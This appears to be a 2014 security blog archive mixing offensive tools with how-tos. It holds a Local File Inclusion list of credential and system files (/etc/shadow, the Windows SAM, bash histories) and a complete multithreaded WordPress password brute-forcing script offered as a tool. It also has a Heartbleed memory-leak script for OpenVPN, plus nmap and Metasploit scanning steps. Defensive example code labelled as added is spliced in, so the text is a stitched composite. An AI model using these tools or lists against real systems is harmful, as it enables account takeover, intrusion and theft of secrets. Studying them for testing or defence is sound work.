Apr 26, 2014

Useful list file for Local File Inclusion

Linux + Solaris files (Darwin [Mac] systems may have a prefix of /private/)

- Fingerprinting (General files)
  • /etc/passwd
  • /etc/master.passwd
  • /etc/shadow
  • /var/db/shadow/hash
  • /etc/group
  • /etc/hosts
  • /etc/motd
  • /etc/issue
  • /etc/release
  • /etc/redhat-release
  • /etc/crontab
  • /etc/inittab
  • /proc/version
  • /proc/cmdline
  • /proc/self/environ
  • /proc/self/fd/0
  • /proc/self/fd/1
  • /proc/self/fd/2
  • /proc/self/fd/255
  • /etc/httpd.conf
  • /etc/apache2.conf
  • /etc/apache2/apache2.conf
  • /etc/apache2/httpd.conf
  • /etc/httpd/conf/httpd.conf
  • /etc/httpd/httpd.conf
  • /etc/apache2/conf/httpd.conf
  • /etc/apache/conf/httpd.conf
  • /usr/local/apache2/conf/httpd.conf
  • /usr/local/apache/conf/httpd.conf
  • /etc/apache2/sites-enabled/000-default
  • /etc/apache2/sites-available/default
  • /etc/nginx.conf
  • /etc/nginx/nginx.conf
  • /etc/nginx/sites-available/default
  • /etc/nginx/sites-enabled/default
  • /etc/ssh/sshd_config
  • /etc/my.cnf
  • /etc/mysql/my.cnf
  • /etc/php.ini
  • /var/mail/www-data
  • /var/mail/www
  • /var/mail/apache
  • /var/mail/nobody
  • /var/www/.bash_history
  • /root/.bash_history
  • /var/root/.bash_history
  • /var/root/.sh_history
- Less common paths for httpd.conf/php.ini
  • /usr/local/apache/httpd.conf
  • /usr/local/apache2/httpd.conf
  • /usr/local/httpd/conf/httpd.conf
  • /usr/local/etc/apache/conf/httpd.conf
  • /usr/local/etc/apache2/conf/httpd.conf
  • /usr/local/etc/httpd/conf/httpd.conf
  • /usr/apache2/conf/httpd.conf
  • /usr/apache/conf/httpd.conf
  • /etc/http/conf/httpd.conf
  • /etc/http/httpd.conf
  • /opt/apache/conf/httpd.conf
  • /opt/apache2/conf/httpd.conf
  • /var/www/conf/httpd.conf
  • /usr/local/php/httpd.conf
  • /usr/local/php4/httpd.conf
  • /usr/local/php5/httpd.conf
  • /etc/httpd/php.ini
  • /usr/lib/php.ini
  • /usr/lib/php/php.ini
  • /usr/local/etc/php.ini
  • /usr/local/lib/php.ini
  • /usr/local/php/lib/php.ini
  • /usr/local/php4/lib/php.ini
  • /usr/local/php5/lib/php.ini
  • /usr/local/apache/conf/php.ini
  • /etc/php4/apache/php.ini
  • /etc/php4/apache2/php.ini
  • /etc/php5/apache/php.ini
  • /etc/php5/apache2/php.ini
  • /etc/php/php.ini
  • /etc/php/php4/php.ini
  • /etc/php/apache/php.ini
  • /etc/php/apache2/php.ini
  • /usr/local/Zend/etc/php.ini
  • /opt/xampp/etc/php.ini
  • /var/local/www/conf/php.ini
  • /etc/php/cgi/php.ini
  • /etc/php4/cgi/php.ini
  • /etc/php5/cgi/php.ini
- OS Logs
 Linux
  • /var/log/lastlog
  • /var/log/wtmp
  • /var/run/utmp
  • /var/log/messages.log
  • /var/log/messages
  • /var/log/messages.0
  • /var/log/messages.0.gz
  • /var/log/messages.1
  • /var/log/messages.1.gz
  • /var/log/messages.2
  • /var/log/messages.2.gz
  • /var/log/messages.3
  • /var/log/messages.3.gz
  • /var/log/syslog.log
  • /var/log/syslog
  • /var/log/syslog.0
  • /var/log/syslog.0.gz
  • /var/log/syslog.1
  • /var/log/syslog.1.gz
  • /var/log/syslog.2
  • /var/log/syslog.2.gz
  • /var/log/syslog.3
  • /var/log/syslog.3.gz
  • /var/log/auth.log
  • /var/log/auth.log.0
  • /var/log/auth.log.0.gz
  • /var/log/auth.log.1
  • /var/log/auth.log.1.gz
  • /var/log/auth.log.2
  • /var/log/auth.log.2.gz
  • /var/log/auth.log.3
  • /var/log/auth.log.3.gz
 Solaris
  • /var/log/authlog
  • /var/log/syslog
  • /var/adm/lastlog
  • /var/adm/messages
  • /var/adm/messages.0
  • /var/adm/messages.1
  • /var/adm/messages.2
  • /var/adm/messages.3
  • /var/adm/utmpx
  • /var/adm/wtmpx
 Mac
  • /var/log/kernel.log
  • /var/log/secure.log
  • /var/log/mail.log
  • /var/run/utmp
  • /var/log/wtmp
  • /var/log/lastlog
- HTTPD Logs
  • /var/log/access.log
  • /var/log/access_log
  • /var/log/error.log
  • /var/log/error_log
  • /var/log/apache2/access.log
  • /var/log/apache2/access_log
  • /var/log/apache2/error.log
  • /var/log/apache2/error_log
  • /var/log/apache/access.log
  • /var/log/apache/access_log
  • /var/log/apache/error.log
  • /var/log/apache/error_log
  • /var/log/httpd/access.log
  • /var/log/httpd/access_log
  • /var/log/httpd/error.log
  • /var/log/httpd/error_log
  • /etc/httpd/logs/access.log
  • /etc/httpd/logs/access_log
  • /etc/httpd/logs/error.log
  • /etc/httpd/logs/error_log
  • /usr/local/apache/logs/access.log
  • /usr/local/apache/logs/access_log
  • /usr/local/apache/logs/error.log
  • /usr/local/apache/logs/error_log
  • /usr/local/apache2/logs/access.log
  • /usr/local/apache2/logs/access_log
  • /usr/local/apache2/logs/error.log
  • /usr/local/apache2/logs/error_log
  • /var/www/logs/access.log
  • /var/www/logs/access_log
  • /var/www/logs/error.log
  • /var/www/logs/error_log
  • /opt/lampp/logs/access.log
  • /opt/lampp/logs/access_log
  • /opt/lampp/logs/error.log
  • /opt/lampp/logs/error_log
  • /opt/xampp/logs/access.log
  • /opt/xampp/logs/access_log
  • /opt/xampp/logs/error.log
  • /opt/xampp/logs/error_log
- PHP Session Locations
  • /tmp/sess_<sessid>
  • /var/lib/php/session/sess_<sessid>
  • /var/lib/php5/session/sess_<sessid>
Windows files
- Fingerprinting
  • *:\boot.ini
  • *:\WINDOWS\win.ini
  • *:\WINNT\win.ini
  • *:\WINDOWS\Repair\SAM
  • *:\WINDOWS\php.ini
  • *:\WINNT\php.ini
  • *:\Program Files\Apache Group\Apache\conf\httpd.conf
  • *:\Program Files\Apache Group\Apache2\conf\httpd.conf
  • *:\Program Files\xampp\apache\conf\httpd.conf
  • *:\php\php.ini
  • *:\php5\php.ini
  • *:\php4\php.ini
  • *:\apache\php\php.ini
  • *:\xampp\apache\bin\php.ini
  • *:\home2\bin\stable\apache\php.ini
  • *:\home\bin\stable\apache\php.ini
- Logs
  • *:\Program Files\Apache Group\Apache\logs\access.log
  • *:\Program Files\Apache Group\Apache\logs\error.log
- PHP Session Locations
  • *:\WINDOWS\TEMP\
  • *:\php\sessions\
  • *:\php5\sessions\
  • *:\php4\sessions\


If you like my blog, please donate,
or click the banner to support me.

Best 6 for learning about Kali

1. Kali Linux by Beginner Hacking - blog

Part of the Beginner Hacking blog, the post is a complete and well-explained guide, at least for beginners. So if you have just installed Kali Linux and are willing to learn the basics, here's where you should head.

2. Hack with Kali Linux - blog

This is one blog that is completely dedicated to Kali Linux. The blog provides everything from hacker's news to hacker's tools to tutorial and hence is 'the' place to visit for both new and pro Kali users.

3. Web Penetration Testing with Kali Linux - eBook

Web Penetration Testing with Kali Linux is designed to be a guide for professional Penetration Testers looking to include Kali in a web application penetration engagement.

4. Kali Linux Cookbook - eBook

Kali Linux Cookbook will serve as an excellent source of information for the security professional and novice alike. The book offers detailed descriptions and example recipes that allow you to quickly get up to speed on both Kali Linux and its usage in the penetration testing field.

5. Introduction to Kali Linux – Official Documentation

This is the official Kali Linux documentation, which serves as a complete guide to understanding Kali Linux and its features.

6. Introduction to Kali - The Linux Operating System Built for Hacking - Video

If a picture says a thousand words, then we wonder how many a video will say! Well, jokes apart, this is a YouTube video by Eli the Computer Guy and is an awesome tutorial for Kali Linux, although the tutorial does require you to have a strong foundation in Linux, networking and computer systems.


Source: http://efytimes.com/e1/fullnews.asp?edid=121888 



Apr 23, 2014

Howto: Setup openvpn server on Ubuntu-12.04

1. Install openvpn and openssl
apt-get update
apt-get install openvpn openssl vim

2. Copy default config from /usr/share/doc/openvpn/examples/easy-rsa/2.0/ to /etc/openvpn/easy-rsa
cd /etc/openvpn
cp -r /usr/share/doc/openvpn/examples/easy-rsa/2.0 ./easy-rsa

3. Edit /etc/openvpn/easy-rsa/vars
Change from
export EASY_RSA="`pwd`"
to

export EASY_RSA="/etc/openvpn/easy-rsa"

4. Go to /etc/openvpn/easy-rsa and run this command
. ./vars

5. Clear keys
./clean-all

6. Create config openssl.cnf from openssl-1.0.0.cnf
cp openssl-1.0.0.cnf openssl.cnf

7. Build key for openvpn
./build-ca OpenVPN
./build-key-server server
./build-key client1
./build-dh

8. Create openvpn.conf in /etc/openvpn/ with this content.
dev tun
proto udp
port 1194
ca /etc/openvpn/easy-rsa/keys/ca.crt
cert /etc/openvpn/easy-rsa/keys/server.crt
key /etc/openvpn/easy-rsa/keys/server.key
dh /etc/openvpn/easy-rsa/keys/dh1024.pem
user nobody
group nogroup
server 10.10.10.0 255.255.255.0
persist-key
persist-tun
status /var/log/openvpn-status.log
verb 3
client-to-client
push "redirect-gateway def1"
#set the dns servers
push "dhcp-option DNS 8.8.8.8"
push "dhcp-option DNS 8.8.4.4"
log-append /var/log/openvpn
comp-lzo


9. Enable ip forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

10. Create an iptables rule to forward packets (eth0 is my network interface and 10.211.55.25 is the IP address of that interface; change both to match your system)
iptables -t nat -A POSTROUTING -s 10.10.10.0/24 -o eth0 -j SNAT --to 10.211.55.25

11. Start openvpn server
/etc/init.d/openvpn start

12. Create a configuration file (client.conf) for the client with the content below, and copy over the client1 key files that were created in step 7.


dev tun
client
proto udp
remote 10.211.55.25 1194
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client1.crt
key client1.key
comp-lzo
verb 3

13. Run openvpn client
openvpn client.conf
 


Howto: Create lab for testing Heartbleed

This tutorial requires Ubuntu 12.04.

1. Install apache2 and openssl
$ apt-get install apache2 openssl

2. Enable https website
$ a2enmod ssl
$ a2ensite default-ssl

3. Download test script from http://www.aldeid.com/wiki/CVE-2014-016-Heartbleed-Vulnerability

4. Run the test script against your website or openvpn server.


Howto: Check LibSSL for Heartbleed

When you upgrade Ubuntu 12.04 by installing only the openssl package, it is not guaranteed that you have fixed the Heartbleed vulnerability. You must install libssl1.0.0 too. To check the OpenSSL version from the libssl library itself, use this command:

strings /lib/x86_64-linux-gnu/libssl.so.1.0.0 | grep OpenSSL
 


Apr 22, 2014

Howto: Convert nmap xml file to csv file

I got the script from http://blog.didierstevens.com/2014/04/16/nmap-grepable-script-output-heartbleed/ and it works perfectly, so I am writing this post to explain how it works.

1. Using nmap scans
$ nmap -p443 -sV --script=ssl-heartbleed  target -oX test-heartbleed.xml

2. Download the script from the source (http://didierstevens.com/files/software/nmap-xml-script-output_V0_0_1.zip)

3. Unzip file
$ unzip nmap-xml-script-output_V0_0_1.zip

4. Change permission for executing
chmod +x nmap-xml-script-output.py

5. Run it on the XML output that you got from the nmap scan in #1
./nmap-xml-script-output.py -o test-heartbleed.csv -s "," test-heartbleed.xml
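
The same conversion sketched with the Python standard library, as an added example (not Didier Stevens's script and not code from this blog): it reads the -oX file from the nmap scan and produces one CSV row per ssl-heartbleed result, pulling the "State:" line into its own column for triage. The sample XML, its 192.0.2.x addresses and the function names are constructed for illustration.

```python
import csv
import io
import re
import xml.etree.ElementTree as ET

# Constructed sample shaped like `nmap -oX` output (not from a real scan).
# Addresses are from the 192.0.2.0/24 documentation range.
SAMPLE_XML = """
<nmaprun scanner="nmap">
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="443">
        <state state="open"/>
        <script id="ssl-heartbleed" output="&#10;  VULNERABLE:&#10;  The Heartbleed Bug (constructed text)&#10;    State: VULNERABLE&#10;    Risk factor: High"/>
      </port>
    </ports>
  </host>
  <host>
    <address addr="192.0.2.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/></port>
      <port protocol="tcp" portid="443">
        <state state="open"/>
        <script id="ssl-heartbleed" output="&#10;  NOT VULNERABLE:&#10;  The Heartbleed Bug (constructed text)&#10;    State: NOT VULNERABLE"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# The vulnerability report printed by the script carries a "State: ..." line.
STATE_RE = re.compile(r"State:\s*(.+)")

def script_rows(xml_text, script_id="ssl-heartbleed"):
    """Return one row per <script id=script_id> element found under a port."""
    rows = []
    root = ET.fromstring(xml_text.strip())
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else ""
        for port in host.iter("port"):
            for script in port.findall("script"):
                if script.get("id") != script_id:
                    continue
                output = script.get("output", "")
                match = STATE_RE.search(output)
                state = match.group(1).strip() if match else "UNKNOWN"
                flat = " ".join(output.split())  # collapse newlines for CSV
                rows.append([addr, port.get("protocol"), port.get("portid"),
                             script_id, state, flat])
    return rows

def to_csv(rows, sep=","):
    """Serialise rows with a header line; csv handles quoting of separators."""
    buf = io.StringIO()
    writer = csv.writer(buf, delimiter=sep, lineterminator="\n")
    writer.writerow(["address", "protocol", "port", "script", "state", "output"])
    writer.writerows(rows)
    return buf.getvalue()

if __name__ == "__main__":
    print(to_csv(script_rows(SAMPLE_XML)), end="")
```

Ports without script output (port 22 in the sample) produce no row, so the CSV lists only services the script actually tested.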


Tools: Multithread wordpress brute forcing tool with python

    #!/usr/bin/python
    # Video: http://youtu.be/mURnM-Yp72g
    # Coded By: xSecurity
     
    import urllib, urllib2, os, sys, requests as xsec, re
    from time import sleep
    from threading import Thread
    def cls():
        linux = 'clear'
        windows = 'cls'
        os.system([linux,windows][os.name == 'nt'])
    cls()
    print '''
          __                      _ _        
    __  __/ _\ ___  ___ _   _ _ __(_) |_ _   _
    \ \/ /\ \ / _ \/ __| | | | '__| | __| | | |
    >  < _\ \ __/ (__| |_| | |  | | |_| |_| |
    /_/\_\\__/\___|\___|\__,_ |_|  |_|\__|\__, |
                                        |___/WordPress Brute Muliththreading :)
    #Home: Sec4ever.CoM | Is-Sec.CoM | s3c-k.com
    #Greets: UzunDz - b0x - Lov3rDNS - Mr.Dm4r - DamaneDz - rOx - r0kin
    Special For My Lov3r Cyber-Crystal
    #Usage: Python wp.py http://target.com/ admin pass.txt
    #Note: U Need Install Requests Package: http://www.youtube.com/watch?v=Ng5T18HyA-Q'''
     
    xsec = xsec.session()
    def brute(target,usr,pwd):
        get = xsec.get(target+'/wp-admin/')
        post = {}
        post["log"] = usr
        post["pwd"] = pwd
        post["wp-submit"] = "Log+in"
        post["redirect_to"] = target
        post["testcookie"] = "1"
        get2 = xsec.post(target+'/wp-login.php' , data=urllib.urlencode(post))
        get3 = xsec.get(target+'/wp-admin')
        if '<li id="wp-admin-bar-logout">' in get3.text:
            print '[+] Cracked Username: '+usr+' & Password: '+pwd
            os._exit(1)
        else:
            print '[~] Trying ...: '+pwd
     
    if len(sys.argv) >= 3:
        target = sys.argv[1]
        usr = sys.argv[2]
        lst = open(sys.argv[3]).read().split("\n")
        print '[*]Target: '+target
        print '[*]LIST:',len(lst)
        print '[*]Username: '+usr
        thrdlst = []
        for pwd in lst:
            t = Thread(target=brute, args=(target,usr,pwd))
            t.start()
            thrdlst.append(t)
            sleep(0.009)
        for b in thrdlst:
            b.join()
    else:
        print '[>]There Somthing Missing Check ARGVS :)'

Source: http://pastebin.com/4BV4Kj0a
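
From the defender's side, the tool above shows up in the web server log as a burst of POST requests to /wp-login.php from one address, one per password tried. The following is an added example, not part of the pasted tool: a sliding-window counter over Apache combined-format log lines. The log lines, addresses, threshold and window are constructed assumptions, and lines are assumed to arrive in time order.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache/nginx "combined" log format: ip, timestamp, request line, status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample: eight login POSTs within two seconds from one address,
# plus one ordinary login from another. Addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Apr/2014:10:15:0%d +0000] "POST /wp-login.php HTTP/1.1" '
    '200 3512 "-" "python-requests/2.2.1"' % (i // 4)
    for i in range(8)
] + [
    '198.51.100.20 - - [22/Apr/2014:10:15:03 +0000] "POST /wp-login.php HTTP/1.1" '
    '302 0 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [22/Apr/2014:10:15:04 +0000] "GET /wp-admin/ HTTP/1.1" '
    '200 8120 "-" "Mozilla/5.0"',
]

def parse(line):
    """Return (ip, time, method, path, status), or None for unparsable lines."""
    match = LINE_RE.match(line)
    if not match:
        return None
    ip, stamp, method, path, status = match.groups()
    when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when, method, path.split("?", 1)[0], int(status)

def login_bursts(lines, threshold=5, window_s=10):
    """Map each source IP to its peak count of login POSTs inside the window.

    Only IPs that reach `threshold` POSTs to wp-login.php within `window_s`
    seconds are returned. Both values are assumptions to tune per site.
    """
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    flagged = {}
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, when, method, path, _status = rec
        if method != "POST" or not path.endswith("/wp-login.php"):
            continue
        window = recent[ip]
        window.append(when)
        # Drop attempts that have aged out of the window.
        while (when - window[0]).total_seconds() > window_s:
            window.popleft()
        if len(window) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(window))
    return flagged

if __name__ == "__main__":
    for ip, peak in login_bursts(SAMPLE_LOG).items():
        print("%s: %d login POSTs inside the window" % (ip, peak))
```

The same counter can feed a rate limit or a temporary block on the login endpoint; the User-Agent is not used as a signal here because a client can set it to anything.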


Tools: Heartbleed Vulnerability in VPN

#!/usr/bin/env python2
# Quick and dirty demonstration of CVE-2014-0160 on OpenVPN
# by Stefan Agner (stefan@agner.ch)
# based on work of Jared Stafford and Yonathan Klijnsma
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
target = None
# OpenVPN Session ID
lsesseionid = 0x12345678
packetid = 0
options = OptionParser(usage='%prog server [options]', description='Test for TLS heartbeat vulnerability on OpenVPN Server (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=1194, help='Port to test (default: 1194)')
def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')
hello_openvpn = h2bin('''
16 03 01 00 df 01 00 00 db 03 01 95 a3 8a 7f 46
a9 1c 78 99 21 ae 92 6d 2d 14 5a 8f 2b c8 ee e2
0b 9e 38 34 ec 3d 66 2b 9c d5 63 00 00 68 c0 14
c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f
c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16
00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e
00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04
00 2f 00 96 00 41 00 07 c0 11 c0 07 c0 0c c0 02
00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08
00 06 00 03 00 ff 02 01 00 00 49 00 0b 00 04 03
00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00
0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00
06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00
01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00
0f 00 01 01
''')
# Get OpenVPN header...
def msg_hdr(hdr):
    if hdr is None:
        return None, None, None
    typ, sessionid, packarrlen = struct.unpack('>bQb', hdr)
    #print "Typ %d, SessionID %d, Packet-ID array length %d" % (typ, sessionid, packarrlen)
    return typ, sessionid, packarrlen
def msg_tls_heartbeat_header(data):
    typ, ver, length = struct.unpack('>bhh', data[0:5])
    return typ, ver, length
def msg_tls_heartbeat_request(payload, hb_length=0x4000):
    return struct.pack('>bhhbh{0}s'.format(len(payload)), 24, 0x0301, len(payload) + 3, 1, hb_length, payload)
 
def check_hb(typ, ver, pay_length):
    if typ == 24:
        if pay_length > 3:
            print target + '|VULNERABLE'
        else:
            print target + '|NOT VULNERABLE'
        return True
    if typ == 21:
        print target + '|NOT VULNERABLE'
        return False
    print target + '|NOT VULNERABLE'
    return False
def msg_id(data):
    packid, = struct.unpack('>i', data)
    return packid
def msg_pack(data):
    # Packet ID...
    return
def hexdump(src, length=8):
    result = []
    digits = 4 if isinstance(src, unicode) else 2
    for i in xrange(0, len(src), length):
       s = src[i:i+length]
       hexa = b' '.join(["%0*X" % (digits, ord(x)) for x in s])
       text = b''.join([x if 0x20 <= ord(x) < 0x7F else b'.' for x in s])
       result.append( b"%04X %-*s %s" % (i, length*(digits + 1), hexa, text) )
    return b'\n'.join(result)
def send_message(s, data):
    global packetid
    start = 0
    length = 0
    cnt = 0
    bytes_remaining = len(data)
    while bytes_remaining > 0:
        if bytes_remaining > 100:
            length = 100
        else:
            length = bytes_remaining
        s.send(struct.pack('>bQbi{0}s'.format(length), 0x20, lsesseionid, 0, packetid, data[start:start+length]))
        sys.stdout.flush()
        packetid += 1
        cnt += 1
        bytes_remaining -= length
        start += length
    return cnt
def handle_message(s):
    global lsesseionid
    data = s.recv(1024)
    pos = 10
    typ, sessionid, packarrlen = msg_hdr(data[0:pos])
    if packarrlen > 0:
        pos = 10 + packarrlen * 4
        msg_pack(data[10:pos])
        # Remote-SessionID
        pos += 8
    if typ == 0x28:
        #print "Ack received"
        return typ, sessionid, packarrlen, None, None
    # Send ACK..
    packid = msg_id(data[pos:pos+4])
    s.send(struct.pack('>bQbiQ', 0x28, lsesseionid, 1, packid, sessionid))
    if typ == 0x20:
        #print "Control Message received"
        return typ, sessionid, packarrlen, packid, data[pos+4:]
    return typ, sessionid, packarrlen, packid, None
def main():
    global target
    global lsesseionid
    global packetid
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return
    target = args[0]
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sys.stdout.flush()
    s.connect((target, opts.port))
    sys.stdout.flush()
    s.send(struct.pack('>bqbi', 0x38, lsesseionid, 0, packetid))
    packetid += 1
    typ, sessionid, packarrlen, packid, payload = handle_message(s)
    send_message(s, hello_openvpn)
    while True:
        typ, sessionid, packarrlen, packid, payload = handle_message(s)
        # Look for server hello done message.
        if typ == 0x20 and len(payload) < 100:
            break
        if typ == None:
            print "Hello message failed"
            return
    hb_length = 0x1000
    hb = msg_tls_heartbeat_request("Heartbleed test payload", hb_length)
    send_message(s, hb)
    hb_received = False
    heartbleed = ""
    other = 0
    # Heartbeat delivered, if vulnerable, we receive data...
    while True:
        typ, sessionid, packarrlen, packid, payload = handle_message(s)
        if typ == 0x20:
            # Control message, should contain heartbeat answer...
            heartbleed += payload
            if not hb_received:
                # Check HB header early...
                hb_received = True
                tlstype, tlsversion, tlslength = msg_tls_heartbeat_header(payload)
                check_hb(tlstype, tlsversion, tlslength)
        elif typ == 0x28:
            # We received ack only, the server ignored our heartbeat
            print target + '|NOT VULNERABLE (only ACK received)'
            return
        if len(heartbleed) >= hb_length + 5:
            break
    print hexdump(heartbleed[0:100], 16)
if __name__ == '__main__':
    main()
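
The request built by msg_tls_heartbeat_request above declares a payload length (hb_length) far larger than the payload it carries, and that mismatch is what a patched peer or a network sensor has to reject. The check below is an added example, not part of Stefan Agner's script: it applies the RFC 6520 bounds rule to plaintext TLS records, as in this test where the heartbeat is sent before the handshake completes. The function names are hypothetical, the sample records are constructed, and on OpenVPN the TLS stream must first be reassembled from the control packets.

```python
import struct

HEARTBEAT = 24      # TLS record content type for heartbeat (RFC 6520)
MIN_PADDING = 16    # RFC 6520 requires at least 16 bytes of padding

def classify_heartbeat(record):
    """Classify one plaintext TLS record (5-byte header followed by body)."""
    if len(record) < 5:
        return "truncated"
    ctype, _version, rec_len = struct.unpack(">BHH", record[:5])
    if ctype != HEARTBEAT:
        return "not-heartbeat"
    body = record[5:5 + rec_len]
    if len(body) < rec_len:
        return "truncated"
    if rec_len < 3:
        return "malformed"
    _hb_type, claimed = struct.unpack(">BH", body[:3])
    # type (1) + payload_length (2) + payload + padding must fit in the record;
    # a message that claims more than it carries must be discarded silently.
    if 1 + 2 + claimed + MIN_PADDING > rec_len:
        return "over-read"
    return "ok"

def scan_stream(data):
    """Walk consecutive TLS records in a reassembled byte stream."""
    verdicts, pos = [], 0
    while pos + 5 <= len(data):
        rec_len = struct.unpack(">H", data[pos + 3:pos + 5])[0]
        verdicts.append(classify_heartbeat(data[pos:pos + 5 + rec_len]))
        pos += 5 + rec_len
    return verdicts

def make_record(claimed, payload, padding=b""):
    """Build a heartbeat request record for the constructed samples below."""
    body = struct.pack(">BH", 1, claimed) + payload + padding
    return struct.pack(">BHH", HEARTBEAT, 0x0301, len(body)) + body

# Constructed samples. BAD has the same layout as the request in the script
# above: 23 bytes of payload, 0x1000 declared, no padding.
PAYLOAD = b"Heartbleed test payload"
BAD = make_record(0x1000, PAYLOAD)
GOOD = make_record(len(PAYLOAD), PAYLOAD, bytes(MIN_PADDING))
HANDSHAKE = b"\x16\x03\x01\x00\x02\x00\x00"   # 2-byte dummy handshake record

if __name__ == "__main__":
    print(scan_stream(HANDSHAKE + GOOD + BAD))
```

Once the session is encrypted the declared length is no longer visible on the wire, so a sensor has to fall back on comparing the sizes of heartbeat requests and responses.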
 
 





Apr 21, 2014

Howto: Test Heartbleed with Nmap or Metasploit in Kali

Nmap
1. Update nmap & nse
$ apt-get install nmap
$ nmap --script-updatedb
(Or you can download ssl-heartbleed.nse from https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse, and tls.lua from http://nmap.org/svn/nselib/tls.lua. Save tls.lua to /usr/share/nmap/nselib and ssl-heartbleed.nse to /usr/share/nmap/scripts/)

2. Run an nmap scan with the heartbleed script.
$ nmap -sV --script=ssl-heartbleed --script-args vulns.showall target
Options summary:
  • -d turns on debugging output, helpful for seeing problems with the script.
  • --script ssl-heartbleed selects the ssl-heartbleed script to run on appropriate ports.
  • --script-args vulns.showall tells the script to output "NOT VULNERABLE" when it does not detect the vulnerability.
  • -sV requests a service version detection scan, which will allow the script to run against unusual ports that support SSL.
  • --script-trace shows a packet dump of all script-related traffic, which may show memory dumps from the Heartbleed bug.
  • -p 443 limits the script to port 443, but use caution! Even services like SMTP, FTP, and IMAP can be vulnerable.
  • -oA heartbleed-%y%m%d saves Nmap's output in 3 formats as heartbleed-20140410.nmap, heartbleed-20140410.xml, and heartbleed-20140410.gnmap.


Metasploit
1. Update your metasploit
$ msfupdate

2. Get your msfconsole
$ msfconsole

3. Use the auxiliary/scanner/ssl/openssl_heartbleed module, set RHOSTS to the target host, and run it
msf> use auxiliary/scanner/ssl/openssl_heartbleed
msf> set RHOSTS <target>
msf> run




Apr 20, 2014

Tools: 10 Hacking Tools Of Android

1. Hackode

Hackode: The Hacker's Toolbox is an application for penetration testers, ethical hackers, IT administrators and cyber security professionals to perform different tasks like reconnaissance, scanning, performing exploits etc.

2. androrat

Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the server.

3. APKInspector

APKinspector is a powerful GUI tool for analysts to analyse Android applications. The goal of this project is to aid analysts and reverse engineers to visualise compiled Android packages and their corresponding DEX code.

4. DroidBox

DroidBox is developed to offer dynamic analysis of Android applications.

5. Burp Suite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

6. zANTI

zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.

7. Droid Sheep

DroidSheep can be easily used by anybody who has an Android device, and only the provider of the webservice can protect the users. So anybody can test the security of his account by himself and can decide whether to keep on using the webservice.

8. dSploit

dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assessments on a mobile device.

9. AppUse – Android Pentest Platform Unified Standalone Environment

AppSec Labs recently developed the AppUse Virtual Machine. This system is a unique, free platform for mobile application security testing in the Android environment, and it includes unique custom-made tools created by AppSec Labs.

10. Shark for Root

Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open the dump, use Wireshark or similar software; to preview the dump on the phone, use Shark Reader. Based on tcpdump.


Source: http://www.efytimes.com/e1/fullnews.asp?edid=136275


 
